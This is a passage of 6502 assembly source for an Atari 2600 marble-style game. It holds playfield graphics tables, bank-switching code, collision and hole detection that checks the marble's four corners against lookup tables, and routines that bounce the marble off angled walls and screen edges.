dc.b $B2 dc.b $A2 dc.b $C6 dc.b $8C dc.b $18 dc.b $30 dc.b $A0 dc.b $C0 dc.b $80 dc.b $80 dc.b $80 dc.b $A0 dc.b $A0 dc.b $A8 dc.b $A8 ; 120-101 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AB dc.b $AA dc.b $A8 dc.b $A8 dc.b $AC dc.b $A8 dc.b $A8 dc.b $A0 dc.b $B0 dc.b $A0 dc.b $A0 ; 140-121 dc.b $A0 dc.b $C0 dc.b $A0 dc.b $A0 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $02 dc.b $12 dc.b $16 dc.b $12 dc.b $12 dc.b $09 dc.b $08 dc.b $04 ; 160-141 dc.b $04 dc.b $02 dc.b $02 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $40 ; 180-161 dc.b $40 dc.b $20 dc.b $20 dc.b $90 dc.b $10 dc.b $88 dc.b $28 dc.b $A4 dc.b $24 dc.b $B4 dc.b $24 dc.b $A4 dc.b $08 dc.b $C8 dc.b $10 dc.b $90 dc.b $20 dc.b $20 dc.b $40 dc.b $80 ; 200-181 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ;========== ;ORG $CC00 align 256 ;========== Level_0_BlueData_PF2_2 ; 20-0 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 ; 40-21 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $5B dc.b $51 dc.b $60 dc.b $40 dc.b $80 dc.b $04 dc.b $04 dc.b $15 dc.b $15 dc.b $55 dc.b $56 dc.b $54 dc.b $59 dc.b $51 dc.b $60 ; 60-41 dc.b $40 dc.b $80 dc.b $00 dc.b $00 dc.b $00 dc.b $02 dc.b $03 dc.b $0A dc.b $0C dc.b $28 dc.b $28 dc.b $AA dc.b $6A dc.b $2A dc.b $1A dc.b $0A dc.b $06 dc.b $02 dc.b $00 dc.b $01 ; 80-61 dc.b $00 dc.b $00 dc.b $40 dc.b $80 dc.b $00 dc.b $00 dc.b $00 dc.b $02 dc.b $04 dc.b $0D dc.b $15 dc.b $35 dc.b $55 dc.b $D5 dc.b $55 dc.b $35 dc.b $15 dc.b $0D dc.b $05 dc.b $03 ; 100-81 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 120-101 dc.b $00 dc.b $00 dc.b $01 dc.b $01 dc.b $05 dc.b $0D dc.b $05 dc.b $03 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 140-121 dc.b $00 dc.b $08 dc.b $10 dc.b $3C dc.b $74 dc.b $62 dc.b $40 dc.b $00 dc.b $00 dc.b $08 dc.b $54 dc.b $7E dc.b $77 dc.b $63 dc.b $41 dc.b $00 dc.b $00 dc.b $08 dc.b $55 dc.b $7F ; 160-141 dc.b $77 dc.b $6B dc.b $51 dc.b $3C dc.b $7F dc.b $3E dc.b $3E dc.b $5C dc.b $5C dc.b $08 dc.b $88 dc.b $30 dc.b $20 dc.b $40 dc.b $40 dc.b $80 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 180-161 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 200-181 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ;========== ;ORG $CD00 align 256 ;========== Level_0_BlueData_PF2_3 ; 20-0 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 ; 40-21 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $63 dc.b $2A dc.b $14 dc.b $08 dc.b $00 dc.b $81 dc.b $81 dc.b $A0 dc.b $A0 ; 60-41 dc.b $A9 dc.b $A9 dc.b $AA dc.b $6A dc.b $2A dc.b $1A dc.b $0A dc.b $02 dc.b $06 dc.b $02 dc.b $02 dc.b $00 dc.b $00 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $25 dc.b $25 ; 80-61 dc.b $A6 dc.b $A4 dc.b $A8 dc.b $A0 dc.b $A8 dc.b $68 dc.b $2A dc.b $1A dc.b $0A dc.b $02 dc.b $06 dc.b $02 dc.b $02 dc.b $00 dc.b $00 dc.b $01 dc.b $00 dc.b $00 dc.b $08 dc.b $10 ; 100-81 dc.b $34 dc.b $D6 dc.b $35 dc.b $95 dc.b $8D dc.b $C5 dc.b $63 dc.b $31 dc.b $18 dc.b $0C dc.b $06 dc.b $03 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 120-101 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $02 dc.b $06 dc.b $02 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 140-121 dc.b $00 dc.b $04 dc.b $08 dc.b $1E dc.b $3A dc.b $31 dc.b $20 dc.b $00 dc.b $00 dc.b $04 dc.b $2A dc.b $3F dc.b $3B dc.b $31 dc.b $A0 dc.b $00 dc.b $80 dc.b $04 dc.b $AA dc.b $3F ; 160-141 dc.b $BB dc.b $35 dc.b $A2 dc.b $0F dc.b $BF dc.b $1F dc.b $9F dc.b $2E dc.b $AE dc.b $04 dc.b $C4 dc.b $18 dc.b $90 dc.b $20 dc.b $20 dc.b $40 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 180-161 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 200-181 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ;========== ;ORG $CE00 align 256 ;========== Level_0_BlueData_PF1_4 ; 20-0 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 ; 40-21 dc.b $55 dc.b $55 dc.b $55 dc.b $D5 dc.b $55 dc.b $35 dc.b $15 dc.b $0D dc.b $05 dc.b $03 dc.b $01 dc.b $00 dc.b $08 dc.b $18 dc.b $10 dc.b $00 dc.b $08 dc.b $19 dc.b $11 dc.b $00 ; 60-41 dc.b $00 dc.b $01 dc.b $01 dc.b $00 dc.b $00 dc.b $02 dc.b $02 dc.b $0A dc.b $06 dc.b $02 dc.b $01 dc.b $00 dc.b $00 dc.b $02 dc.b $02 dc.b $0A dc.b $06 dc.b $02 dc.b $01 dc.b $00 ; 80-61 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $02 dc.b $02 dc.b $0A dc.b $0A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A ; 100-81 dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2B dc.b $2A dc.b $2C dc.b $28 dc.b $31 dc.b $25 dc.b $46 dc.b $04 dc.b $40 dc.b $40 dc.b $50 dc.b $50 ; 120-101 dc.b $54 dc.b $54 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $56 dc.b $54 dc.b $50 dc.b $50 dc.b $58 dc.b $50 dc.b $50 dc.b $40 dc.b $60 dc.b $40 dc.b $40 ; 140-121 dc.b $00 dc.b $80 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $05 dc.b $25 dc.b $2C dc.b $24 dc.b $24 dc.b $12 dc.b $11 dc.b $09 ; 160-141 dc.b $09 dc.b $05 dc.b $05 dc.b $02 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $80 ; 180-161 dc.b $80 dc.b $40 dc.b $40 dc.b $20 dc.b $20 dc.b $10 dc.b $50 dc.b $48 dc.b $48 dc.b $68 dc.b $48 dc.b $48 dc.b $10 dc.b $90 dc.b $20 dc.b $20 dc.b $40 dc.b $40 dc.b $80 dc.b $00 ; 200-181 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ;============================== ;============================== ORG $CFF6 BANKS_AND_VECTORS ;============================== ;##################################################### ;##################################################### ;##################################################### ;### ### ;### Bank 2 below ### ;### ### ;##################################################### ;##################################################### ;##################################################### ;============ org $D000 ;============ JUMP_TABLE org $D018 rorg $F018 ;================= Bank2Code ;================= ;================== ; BANK 2 organized ;================== ;JSR HandleHole ;JSR HandleCollision ;JSR HandleMusic ;JSR EdgeOfScreenCollisions ; Return to Bank 1 ;LDA #<AfterCollision_InBank1 ;STA ReturnAddress ;LDA #>AfterCollision_InBank1 ;STA ReturnAddress+1 ;JMP Bank1 ;================== ; Check what our table lookup did ; and process it accordingly ;================== LDA CollisionStatusFromTable CMP #WIN BNE NotAWinCondition ; Win condition LDA #2 STA GamePhase IF DEBUG = 1 LDA #$88 STA COLUBK ELSE LDA #$88 STA COLUBK ENDIF JMP ReturntoBank1FromBank2 NotAWinCondition CMP #HOLE BNE NotAHoleCondition ; Service a "fell in hole" situation IF DEBUG = 1 LDA #$48 STA COLUBK ELSE JSR FellInHole ENDIF JMP ReturntoBank1FromBank2 NotAHoleCondition CMP #BUMP BNE NotABumpCondition IF DEBUG = 1 LDA #$28 STA COLUBK ELSE ;JSR SwapMomentum JSR AdjustUsBack ; push us back to before we fell LDA #0 STA Player0SpeedDown STA Player0SpeedUp STA Player0SpeedLeft STA Player0SpeedRight LDA #$80 ; middle value STA Player0VPositionA STA Player0HPositionA LDA #7 STA AUDC0 STA AUDV0 STA AUDF0 ENDIF JMP ReturntoBank1FromBank2 NotABumpCondition LDA #0 STA COLUBK ; Disable sounds, since no collision STA AUDV0 JMP ReturntoBank1FromBank2 ;================= ; Return to Bank 1 ;================= ReturntoBank1FromBank2 LDA #<AfterCollision_InBank1 STA ReturnAddress LDA #>AfterCollision_InBank1 STA ReturnAddress+1 JMP Bank1 ;================= ;================== ; Collision detection ;================== HandleCollision ; We are going to do 4 checks here. ; There is a square that's checked. ; This checks the "upper left corner" LDA Player0HPosition ; initial value 78 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #1 TAX LDA CollisionTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BNE ULCheckTable2 JMP SwapMomentum ULCheckTable2 LDA CollisionTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BNE URCollisionCheck JMP SwapMomentum ; This checks the "upper right corner" URCollisionCheck LDA Player0HPosition ; initial value 78 CLC ADC #4 ; go from bit zero to bit 4 (of 7) LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #1 TAX LDA CollisionTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum LDA CollisionTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum ; This checks the "lower left corner" LDA Player0HPosition ; initial value 78 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #2 TAX LDA CollisionTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum LDA CollisionTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum ; This checks the "lower right corner" LDA Player0HPosition ; initial value 78 CLC ADC #4 ; go from bit zero to bit 4 (of 7) LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #2 TAX LDA CollisionTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum LDA CollisionTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum ; Disable sounds, since no collision LDA #0 STA AUDV0 JMP CollisionsDone ;================== ;================== ; Second half of above routine. ; Calls subroutines ;================== SwapMomentum ; We have a hit! Play a tone LDA #7 STA AUDC0 STA AUDV0 STA AUDF0 ; Figure out direction to bounce based on piece LDA CollisionByte AND #%11000000 CMP #ANGLE_PIPE BEQ HandleAnglePipe CMP #ANGLE_SLASH BEQ HandleAngleSlash CMP #ANGLE_BACKSLASH BEQ HandleAngleBackslash ; No other situations ; so, fall through to HandleAngleMinus HandleAngleMinus JSR AdjustUsBack JSR SwapMomentumVert JMP CollisionsDone HandleAnglePipe JSR AdjustUsBack JSR SwapMomentumHoriz JMP CollisionsDone HandleAngleSlash JSR AdjustUsBack JSR SwapMomentumSlash JMP CollisionsDone HandleAngleBackslash JSR AdjustUsBack JSR SwapMomentumBackSlash ; TEST CODE ;LDA #0 ;STA Player0SpeedLeft ;STA Player0SpeedRight ;STA Player0SpeedUp ;STA Player0SpeedDown CollisionsDone JSR EdgeOfScreenCollisions ;============== RTS ;============== ;================== ; if we fell in a hole handler ;================== HandleHole ; We are going to do 4 checks here. ; There is a square that's checked. ; This checks the "upper left corner" LDA Player0HPosition ; initial value 78 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #1 TAX LDA HoleTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BNE HoleULCheckTable2 JMP FellInHole HoleULCheckTable2 LDA HoleTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BNE HoleURCollisionCheck JMP FellInHole ; This checks the "upper right corner" HoleURCollisionCheck LDA Player0HPosition ; initial value 78 CLC ADC #4 ; go from bit zero to bit 4 (of 7) LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #1 TAX LDA HoleTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole LDA HoleTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole ; This checks the "lower left corner" LDA Player0HPosition ; initial value 78 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #2 TAX LDA HoleTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole LDA HoleTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole ; This checks the "lower right corner" LDA Player0HPosition ; initial value 78 CLC ADC #4 ; go from bit zero to bit 4 (of 7) LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #2 TAX LDA HoleTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole LDA HoleTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole ; Disable sounds, since didn't fall in hole LDA #0 STA AUDV0 ;================== RTS ;================== ;================== ; Part of the above, hole handler ;================== FellInHole LDA #1 STA MarbleFallStatus JSR AdjustUsBack ; push us back to before we fell LDA #0 STA Player0SpeedDown STA Player0SpeedUp STA Player0SpeedLeft STA Player0SpeedRight LDA #$80 ; middle value STA Player0VPositionA STA Player0HPositionA ;================== RTS ;================== ;================== ; Music stuff ;================== HandleMusic RTS ;============== ; Swap momentum ;============== SwapMomentumVert LDA Player0SpeedUp BEQ GoingDown GoingUp LDA Player0SpeedUp STA Player0SpeedDown LDA #0 STA Player0SpeedUp DEC Player0VPosition JMP GoingLeftOrRight GoingDown LDA Player0SpeedDown BEQ GoingLeftOrRight LDA Player0SpeedDown STA Player0SpeedUp LDA #0 STA Player0SpeedDown INC Player0VPosition GoingLeftOrRight LDA #$80 ; middle value STA Player0VPositionA RTS ;================== ;================== SwapMomentumHoriz LDA Player0SpeedLeft BEQ GoingRight GoingLeft LDA Player0SpeedLeft STA Player0SpeedRight LDA #0 STA Player0SpeedLeft INC Player0HPosition JMP RegularCollisionsDone GoingRight LDA Player0SpeedRight BEQ RegularCollisionsDone LDA Player0SpeedRight STA Player0SpeedLeft LDA #0 STA Player0SpeedRight DEC Player0HPosition RegularCollisionsDone LDA #$80 ; middle value STA Player0HPositionA RTS ;================== ;================== ; adjust us to go back one space ;================== AdjustUsBack LDA SWCHAStore AND #%00010000 BNE DontAdjustDown DEC Player0VPosition DontAdjustDown LDA SWCHAStore AND #%00100000 BNE DontAdjustUp INC Player0VPosition DontAdjustUp LDA SWCHAStore AND #%01000000 BNE DontAdjustLeft INC Player0HPosition DontAdjustLeft LDA SWCHAStore AND #%10000000 BNE DontAdjustRight DEC Player0HPosition DontAdjustRight RTS ;================== ;================== SwapMomentumSlash LDA Player0SpeedDown STA Temp LDA Player0SpeedLeft STA Player0SpeedDown LDA Temp STA Player0SpeedLeft LDA Player0SpeedUp STA Temp LDA Player0SpeedRight STA Player0SpeedUp LDA Temp STA Player0SpeedRight ;INC Player0HPosition ;DEC Player0HPosition LDA #$80 ; middle value STA Player0HPositionA RTS ;================== ;================== SwapMomentumBackSlash LDA Player0SpeedUp STA Temp LDA Player0SpeedLeft STA Player0SpeedUp LDA Temp STA Player0SpeedLeft LDA Player0SpeedDown STA Temp LDA Player0SpeedRight STA Player0SpeedDown LDA Temp STA Player0SpeedRight ;INC Player0HPosition ;DEC Player0HPosition LDA #$80 ; middle value STA Player0HPositionA RTS ;================== ;================== EdgeOfScreenCollisions ; Edge of screen collisions LDA Player0HPosition ; initial value 78 CMP #16 ; left-hand extrema BEQ LeftEdgeCollision CMP #15 ; just in case BEQ LeftEdgeCollision JMP NoLeftEdgeCollision LeftEdgeCollision ; Swap momentum ;LDA Player0SpeedLeft ;STA Player0SpeedRight LDA #0 STA Player0SpeedLeft LDA #16 STA Player0HPosition JMP NoRightEdgeCollision NoLeftEdgeCollision LDA Player0HPosition ; initial value 78 CMP #136 ; right-hand extrema BEQ RightEdgeCollision CMP #137 ; just in case BEQ RightEdgeCollision JMP NoRightEdgeCollision RightEdgeCollision ; Swap momentum ;LDA Player0SpeedRight ;STA Player0SpeedLeft LDA #0 STA Player0SpeedRight LDA #136 STA Player0HPosition NoRightEdgeCollision RTS ;================== ;============================== ;========== ;ORG $DD00 align 256 ;========== CollisionTable2 HoleTable1 ; 20-1 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 40-21 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 4 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ;============================== ;========== ;ORG $DE00 align 256 ;========== CollisionTable1 ; 20-1 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 40-21 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 7+ANGLE_PIPE dc.b 7+ANGLE_PIPE dc.b 7+ANGLE_SLASH dc.b 8+ANGLE_SLASH dc.b 8+ANGLE_SLASH dc.b 9+ANGLE_SLASH ; 160-141 dc.b 9+ANGLE_SLASH dc.b 10+ANGLE_SLASH dc.b 10+ANGLE_SLASH dc.b 11+ANGLE_SLASH dc.b 12+ANGLE_SLASH dc.b 13+ANGLE_SLASH dc.b 13+ANGLE_SLASH dc.b 14+ANGLE_SLASH dc.b 14+ANGLE_SLASH dc.b 15+ANGLE_SLASH dc.b 15+ANGLE_SLASH dc.b 16+ANGLE_SLASH dc.b 17+ANGLE_SLASH dc.b 18+ANGLE_SLASH dc.b 18+ANGLE_SLASH dc.b 19+ANGLE_SLASH dc.b 20+ANGLE_MINUS dc.b 0 dc.b 4+ANGLE_SLASH dc.b 5+ANGLE_SLASH ; 180-161 dc.b 5+ANGLE_SLASH dc.b 6+ANGLE_SLASH dc.b 6+ANGLE_SLASH dc.b 7+ANGLE_SLASH dc.b 7+ANGLE_SLASH dc.b 8+ANGLE_SLASH dc.b 8+ANGLE_SLASH dc.b 9+ANGLE_SLASH dc.b 9+ANGLE_PIPE dc.b 9+ANGLE_PIPE dc.b 9+ANGLE_PIPE dc.b 9+ANGLE_BACKSLASH dc.b 8+ANGLE_BACKSLASH dc.b 8+ANGLE_BACKSLASH dc.b 7+ANGLE_BACKSLASH dc.b 7+ANGLE_BACKSLASH dc.b 6+ANGLE_BACKSLASH dc.b 6+ANGLE_BACKSLASH dc.b 5+ANGLE_BACKSLASH dc.b 4+ANGLE_BACKSLASH ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ;============================== ;========== ;ORG $DF00 align 256 ;========== HoleTable2 ; 20-1 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 40-21 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 4 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 